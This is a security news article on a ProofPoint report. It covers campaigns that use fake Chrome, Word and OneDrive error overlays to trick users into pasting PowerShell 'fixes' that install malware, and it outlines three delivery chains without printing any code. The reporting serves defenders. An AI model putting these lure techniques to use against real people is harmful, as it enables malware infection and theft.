Fake Chrome Errors Used to Launch PowerShell Scripts

Malware distributors are using fake error messages from Google Chrome, Word, and OneDrive to trick users into running “patches” that are actually PowerShell scripts installing malicious software. Experts at ProofPoint report that this new tactic has already been adopted by several hacker groups. These attacks are being used by the operators behind the ClearFake scheme, a new malware cluster called ClickFix, and the TA571 group, which is known for spreading spam and distributing emails that lead to malware and ransomware infections.

Previously, ClearFake attacks involved injecting malicious code into compromised legitimate websites, which then displayed fake browser update messages. The new attacks also exploit JavaScript in HTML on hacked sites, but now overlays show users fake error messages from Google Chrome, Microsoft Word, and OneDrive. These messages prompt users to copy a “fix” to their clipboard and then paste and run it manually.

“Although a successful attack requires significant user interaction, the social engineering is sophisticated enough to present both the problem and the solution at the same time, which can prompt users to act without assessing the risks,” specialists warn.

Payloads observed by ProofPoint in this campaign include: DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, clipboard hijacking malware, and the Lumma stealer.

Three Attack Chains Identified

Analysts have identified three attack chains, which mainly differ in their initial stages. Only one of them cannot be confidently linked to the TA571 group mentioned above.

• First Chain (ClearFake): Users visit a compromised website that loads a malicious script hosted on the blockchain via Binance Smart Chain. This script performs several checks and displays a fake notification, supposedly from Google Chrome, about a problem displaying the web page. The dialog then suggests installing a “root certificate” by copying a PowerShell script to the clipboard and running it in Windows PowerShell. After execution, the script checks if the device is a suitable target and then downloads additional payloads.
• Second Chain (ClickFix): This campaign uses injects on hacked sites to create an iframe overlay with fake error messages. Users are prompted to open “Windows PowerShell (Admin)” and paste the provided code, leading to the same consequences as the first chain.
• Third Chain (Email/HTML Attachments): This method involves emails with HTML attachments resembling Microsoft Word documents. Users are prompted to install the Word Online extension to view the document properly. The fake error message offers “How to fix” and “Auto-fix” options. Choosing “How to fix” copies a base64-encoded PowerShell command to the clipboard and instructs the user to paste it into PowerShell. The “Auto-fix” option uses the search-ms protocol to display a fix.msi or fix.vbs file hosted on a remote hacker-controlled resource via WebDAV. PowerShell commands are then loaded and executed through either the MSI file or VBS script, resulting in infection with Matanbuchus and DarkGate malware.